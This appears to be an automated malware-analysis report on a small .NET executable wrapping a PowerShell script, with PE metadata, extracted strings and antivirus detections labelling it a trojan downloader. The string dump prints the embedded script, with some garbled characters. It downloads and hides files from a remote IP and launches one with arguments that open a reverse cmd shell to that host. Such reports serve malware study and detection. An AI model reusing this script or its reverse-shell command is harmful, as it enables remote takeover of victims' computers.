
PE Compile Time

2024-02-01 14:48:07

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00007a14 0x00007c00 5.85281111807
.rsrc 0x0000a000 0x000425a0 0x00042600 6.05709796898
.reloc 0x0004e000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0000a370 0x00042028 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_GROUP_ICON 0x0004c398 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0000a130 0x0000023c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0004c3b0 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
**x2s
**xTs
$XK
$XK
$XK
Z+X(Y
Z+X(Y
#Define the URL and output ut path
$url "http://185.195.26.95/idk.exe" # Replace with the actual URL
$desktopPath [System.Environment]::GetFolderPath([System.Environment+s cial Folder]:: Desktop)
$filename "idk.exe" #Replace with your desired file path SfinalPath Join-Path -Path SdesktopPath -ChildPath Sfilename
$ur12= "http://185.195.26.95/test.jpg"
$filename2 $finalPath2
"test.jpg" Join-Path -Path SdesktopPath -ChildPath $filename2
# Download the file
Invoke-webRequest -Uri Surl -OutFile SfinalPath
Set-ItemProperty -Path $finalPath -Name Attributes -value ([System.IO.FileAttributes]:: Hidden)
Invoke-WebRequest -Uri Sur12 -OutFile SfinalPath2
Set-ItemProperty -Path $finalPath2 -Name Attributes -Value ([System.IO.FileAttributes]:: Hidden)
# Define the parameters for the executable
$params"-d 185.195.26.95 4444 -e cmd.exe" # Replace with actual parameters
# Execute the file le with parameters
Start-Process -FilePath $finalPath -ArgumentList Sparams 23 Start-Process SfinalPath2
v4.0.30319
#Strings
<Module>
test.exe
Credential_Form
ModuleNameSpace
CREDUI_INFO
CREDUI_FLAGS
CredUI_ReturnCodes
User_Pwd
MainModuleRawUI
Input_Box
Choice_Box
ReadKey_Box
Keyboard_Form
Progress_Form
Progress_Data
Console_Info
FileType
STDHandle
MainModuleUI
MainModule
ConsoleColorProxy
MainAppInterface
MainApp
mscorlib
System
Object
ValueType
System.Management.Automation
System.Management.Automation.Host
PSHostRawUserInterface
System.Windows.Forms
PSHostUserInterface
PSHost
System.Text
StringBuilder
CredUIPromptForCredentials
PSCredentialTypes
PSCredentialUIOptions
PromptForPassword
cbSize
hwndParent
pszMessageText
pszCaptionText
hbmBanner
value__
INCORRECT_PASSWORD
DO_NOT_PERSIST
REQUEST_ADMINISTRATOR
EXCLUDE_CERTIFICATES
REQUIRE_CERTIFICATE
SHOW_SAVE_CHECK_BOX
ALWAYS_SHOW_UI
REQUIRE_SMARTCARD
PASSWORD_ONLY_OK
VALIDATE_USERNAME
COMPLETE_USERNAME
PERSIST
SERVER_CREDENTIAL
EXPECT_CONFIRMATION
GENERIC_CREDENTIALS
USERNAME_TARGET_CREDENTIALS
KEEP_USERNAME
NO_ERROR
ERROR_CANCELLED
ERROR_NO_SUCH_LOGON_SESSION
ERROR_NOT_FOUND
ERROR_INVALID_ACCOUNT_NAME
ERROR_INSUFFICIENT_BUFFER
ERROR_INVALID_PARAMETER
ERROR_INVALID_FLAGS
Password
Domain
ConsoleColor
GUIBackgroundColor
GUIForegroundColor
get_BackgroundColor
set_BackgroundColor
get_BufferSize
set_BufferSize
Coordinates
get_CursorPosition
set_CursorPosition
get_CursorSize
set_CursorSize
Invisible_Form
FlushInputBuffer
get_ForegroundColor
set_ForegroundColor
BufferCell
Rectangle
GetBufferContents
get_KeyAvailable
get_MaxPhysicalWindowSize
get_MaxWindowSize
KeyInfo
ReadKeyOptions
ReadKey
ScrollBufferContents
SetBufferContents
get_WindowPosition
set_WindowPosition
get_WindowSize
set_WindowSize
get_WindowTitle
set_WindowTitle
BackgroundColor
BufferSize
CursorPosition
CursorSize
ForegroundColor
KeyAvailable
MaxPhysicalWindowSize
MaxWindowSize
WindowPosition
WindowSize
WindowTitle
MB_GetString
DialogResult
System.Collections.ObjectModel
Collection`1
ChoiceDescription
ToUnicode
GetCharFromKeys
checkKeyDown
keyinfo
KeyEventArgs
Keyboard_Form_KeyDown
Keyboard_Form_KeyUp
ProgressBarColor
System.Timers
barNumber
barValue
inTick
System.Collections.Generic
List`1
progressDataList
System.Drawing
DrawingColor
InitializeComponent
ElapsedEventArgs
TimeTick
AddBar
GetCount
ProgressRecord
Update
lbActivity
lbStatus
ProgressBar
objProgressBar
lbRemainingTime
lbOperation
ActivityId
ParentActivityId
GetStdHandle
GetFileType
IsInputRedirected
IsOutputRedirected
IsErrorRedirected
FILE_TYPE_UNKNOWN
FILE_TYPE_DISK
FILE_TYPE_CHAR
FILE_TYPE_PIPE
FILE_TYPE_REMOTE
STD_INPUT_HANDLE
STD_OUTPUT_HANDLE
STD_ERROR_HANDLE
ErrorForegroundColor
ErrorBackgroundColor
WarningForegroundColor
WarningBackgroundColor
DebugForegroundColor
DebugBackgroundColor
VerboseForegroundColor
VerboseBackgroundColor
ProgressForegroundColor
ProgressBackgroundColor
Dictionary`2
PSObject
FieldDescription
Prompt
PromptForChoice
PSCredential
PromptForCredential
get_RawUI
ib_caption
ib_message
ReadLine
System.Security
SecureString
getPassword
ReadLineAsSecureString
WriteDebugLine
WriteErrorLine
WriteLine
WriteProgress
WriteVerboseLine
WriteWarningLine
parent
System.Globalization
CultureInfo
originalCultureInfo
originalUICultureInfo
get_PrivateData
_consoleColorProxy
get_CurrentCulture
get_CurrentUICulture
get_InstanceId
get_Name
get_UI
Version
get_Version
EnterNestedPrompt
ExitNestedPrompt
NotifyBeginApplication
NotifyEndApplication
SetShouldExit
PrivateData
CurrentCulture
CurrentUICulture
InstanceId
get_ErrorForegroundColor
set_ErrorForegroundColor
get_ErrorBackgroundColor
set_ErrorBackgroundColor
get_WarningForegroundColor
set_WarningForegroundColor
get_WarningBackgroundColor
set_WarningBackgroundColor
get_DebugForegroundColor
set_DebugForegroundColor
get_DebugBackgroundColor
set_DebugBackgroundColor
get_VerboseForegroundColor
set_VerboseForegroundColor
get_VerboseBackgroundColor
set_VerboseBackgroundColor
get_ProgressForegroundColor
set_ProgressForegroundColor
get_ProgressBackgroundColor
set_ProgressBackgroundColor
get_ShouldExit
set_ShouldExit
get_ExitCode
set_ExitCode
ShouldExit
ExitCode
shouldExit
exitCode
UnhandledExceptionEventArgs
CurrentDomain_UnhandledException
credinfo
targetName
reserved1
iError
userName
maxUserName
password
maxPassword
pfSave
System.Runtime.InteropServices
MarshalAsAttribute
UnmanagedType
caption
message
target
credTypes
options
rectangle
source
destination
origin
contents
strTitle
strPrompt
strVal
blSecure
arrChoice
intDefault
wVirtKey
wScanCode
lpKeyState
pwszBuff
OutAttribute
cchBuff
wFlags
blShift
blAltGr
blIncludeKeyDown
sender
position
BarColor
objRecord
stdHandle
descriptions
choices
defaultChoice
allowedCredentialTypes
foregroundColor
backgroundColor
sourceId
record
System.Reflection
AssemblyTitleAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
AssemblyDescriptionAttribute
AssemblyCompanyAttribute
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
DllImportAttribute
credui
String
IsNullOrEmpty
Marshal
SizeOf
IntPtr
ToString
StructLayoutAttribute
LayoutKind
FlagsAttribute
set_Opacity
set_ShowInTaskbar
Control
set_Visible
get_Bottom
get_Top
get_Right
get_Left
Address
BufferCellType
set_Height
set_Width
AppDomain
get_CurrentDomain
get_FriendlyName
user32.dll
ContainerControl
set_AutoScaleDimensions
AutoScaleMode
set_AutoScaleMode
TextBox
Button
set_Text
set_Location
Screen
FromControl
get_Bounds
get_Width
set_MaximumSize
set_AutoSize
ControlCollection
get_Controls
set_UseSystemPasswordChar
SetBounds
PtrToStringUni
set_DialogResult
set_ClientSize
AddRange
FormBorderStyle
set_FormBorderStyle
FormStartPosition
set_StartPosition
Assembly
GetExecutingAssembly
get_Location
ExtractAssociatedIcon
set_Icon
set_MinimizeBox
set_MaximizeBox
IButtonControl
set_AcceptButton
set_CancelButton
ShowDialog
get_Text
get_Count
RadioButton
ToolTip
IEnumerator`1
GetEnumerator
get_Current
get_Label
set_Checked
get_Height
get_HelpMessage
SetToolTip
System.Collections
IEnumerator
MoveNext
IDisposable
Dispose
set_ShowAlways
get_Checked
KeyEventHandler
add_KeyDown
add_KeyUp
get_KeyValue
set_VirtualKeyCode
get_KeyCode
get_Shift
get_Alt
get_Control
get_Chars
set_Character
set_KeyDown
ControlKeyStates
set_ControlKeyState
get_ControlKeyState
get_Modifiers
get_Black
get_Blue
get_Cyan
ColorTranslator
FromHtml
get_Magenta
get_Red
get_White
get_Yellow
SuspendLayout
ScrollableControl
set_AutoScroll
set_BackColor
set_ControlBox
ResumeLayout
ElapsedEventHandler
add_Elapsed
set_Interval
set_AutoReset
get_Item
set_Value
Refresh
set_Left
set_Top
get_Font
FontStyle
set_Font
ProgressBarStyle
set_Style
set_ForeColor
set_Size
get_ActivityId
ProgressRecordType
get_RecordType
Remove
System.ComponentModel
Component
RemoveAt
get_ParentActivityId
Insert
get_Activity
get_StatusDescription
get_PercentComplete
get_SecondsRemaining
TimeSpan
get_TotalHours
get_Minutes
get_Seconds
Format
Concat
get_CurrentOperation
Application
DoEvents
Kernel32.dll
MessageBox
get_ParameterAssemblyFullName
RuntimeTypeHandle
GetTypeFromHandle
GetType
get_IsArray
GetElementType
MakeGenericType
EmptyTypes
ConstructorInfo
BindingFlags
Binder
ParameterModifier
GetConstructor
Invoke
Convert
ChangeType
InvokeMember
op_Inequality
op_Equality
get_DefaultValue
Exception
ToCharArray
AppendChar
Console
ConsoleKeyInfo
ConsoleKey
get_Key
get_Length
get_KeyChar
System.Threading
Thread
get_CurrentThread
NewGuid
AsPSObject
ArgumentNullException
STAThreadAttribute
<>c__DisplayClass6
ManualResetEvent
DataAddedEventArgs
<Main>b__0
<Main>b__1
IAsyncResult
<Main>b__2
PSDataCollection`1
ErrorRecord
get_Index
get_Exception
get_Message
get_IsCompleted
EventWaitHandle
EnableVisualStyles
UnhandledExceptionEventHandler
add_UnhandledException
System.Management.Automation.Runspaces
RunspaceFactory
Runspace
CreateRunspace
ApartmentState
set_ApartmentState
PowerShell
Create
set_Runspace
PSDataStreams
get_Streams
get_Error
EventHandler`1
add_DataAdded
Complete
Compare
StringComparison
StartsWith
StringSplitOptions
MessageBoxButtons
MessageBoxIcon
System.Diagnostics
Debugger
Launch
System.IO
Stream
GetManifestResourceStream
Encoding
get_UTF8
StreamReader
TextReader
ReadToEnd
WriteAllText
AddScript
System.Text.RegularExpressions
get_Success
GroupCollection
get_Groups
Double
TryParse
AddParameter
Capture
get_Value
ToUpper
Boolean
AddArgument
AddCommand
AsyncCallback
PSInvocationSettings
BeginInvoke
WaitHandle
WaitOne
PSInvocationStateInfo
get_InvocationStateInfo
PSInvocationState
get_State
get_Reason
CompilerGeneratedAttribute
test.ps1
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Secure input:
Input:
Cancel
Press a key
#000080
#808080
#008000
#008080
#800080
#800000
#808000
#C0C0C0
#00FF00
Remaining time:
{0:00}:{1:00}:{2:00}
System.Collections.Generic.List
{0}[{1}]:
ToArray
(Type !? for help.)
Wrong format, please repeat input:
PSRunspace-Host
-extract
If you specify the -extract option you need to add a file for extraction in this way
-extract:"<filename>"
-debug
test.ps1
^-([^: ]+)[ :]?([^:]*)$
$FALSE
Out-String
Stream
Click OK to exit...
Unhandled exception in
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
test.exe
LegalCopyright
OriginalFilename
test.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.Generic.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win32.Generic.dh
ALYac Gen:Variant.Barys.465132
Cylance Unsafe
Zillya Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Clean
Alibaba Clean
K7GW Clean
Cybereason malicious.98d796
huorong Clean
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 Clean
APEX Malicious
Avast Win32:Malware-gen
Cynet Clean
Kaspersky HEUR:Trojan-Downloader.PowerShell.Small.uri
BitDefender Gen:Variant.Barys.465132
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.Barys.465132
Tencent Clean
TACHYON Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Gen:Variant.Barys.465132
TrendMicro Clean
McAfeeD ti!23E5ED6923CC
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.ed6763398d7969ed
Emsisoft Gen:Variant.Barys.465132 (B)
Ikarus Trojan.PowerShell.Crypt
GData Gen:Variant.Barys.465132
Jiangmin Clean
Webroot Clean
Varist W32/MSIL_Agent.HYO.gen!Eldorado
Avira Clean
Antiy-AVL Clean
Kingsoft malware.kb.c.988
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Barys.D718EC
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Downloader.PowerShell.Small.uri
Microsoft Clean
Google Detected
AhnLab-V3 Trojan/Win.Kryptik.C5092735
Acronis Clean
McAfee GenericRXUP-TK!ED6763398D79
MAX malware (ai score=89)
VBA32 Clean
Malwarebytes Malware.AI.4098360636
Panda Clean
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002H06B124
Rising HackTool.Lsassdump!8.13011 (CLOUD)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet PossibleThreat
BitDefenderTheta Gen:NN.ZemsilF.36810.sm0@aiQCXZg
AVG Win32:Malware-gen
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_70% (W)
alibabacloud Clean
No IRMA results available.